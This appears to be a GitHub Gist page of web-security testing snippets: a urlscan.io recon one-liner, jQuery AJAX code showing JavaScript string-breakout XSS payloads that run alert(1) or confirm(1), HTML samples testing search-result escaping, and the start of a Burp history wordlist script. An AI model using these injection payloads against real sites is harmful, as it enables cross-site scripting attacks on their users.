Skip to content

Instantly share code, notes, and snippets.

View urlscan.sh
#!/bin/bash
curl -s "https://urlscan.io/api/v1/search/?q=domain:$1" | grep -E '"url"' | cut -d '"' -f4 | grep -F $1 | sort -u
View e.js
function getCard() {
$.ajax({
url: "/savings/getcard",
type: "GET",
data: {id: 'abc\', num: '-1}});}; alert(1); {$.ajax({//'},
success: function (response) {
window.location.href = response.token;
},
error: function (response) {
View d.js
function getCard() {
$.ajax({
url: "/savings/getcard",
type: "GET",
data: {id: 'abc\', num: '};confirm(1);//'},
success: function (response) {
window.location.href = response.token;
},
error: function (response) {
View c.js
function getCard() {
$.ajax({
url: "/savings/getcard",
type: "GET",
data: {id: 'abc'<', num: '123'<'},
success: function (response) {
window.location.href = response.token;
},
error: function (response) {
View b.html
<div>Your search for <b>test123'&quot;&lt;\</b> returned 0 results</div>
<script>
queryText = "test123'&quot;&lt;\"
</script>
View a.html
<div>Your search for <b>test123'&quot;&lt;</b> returned 0 results</div>
<script>
queryText = "test123'&quot;&lt;"
</script>
View burplist.py
import xml.etree.ElementTree as ET
import urllib
import base64
import math
import sys
import re
# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file.
# python burplist.py burprequests.xml
# output is saved to wordlist.txt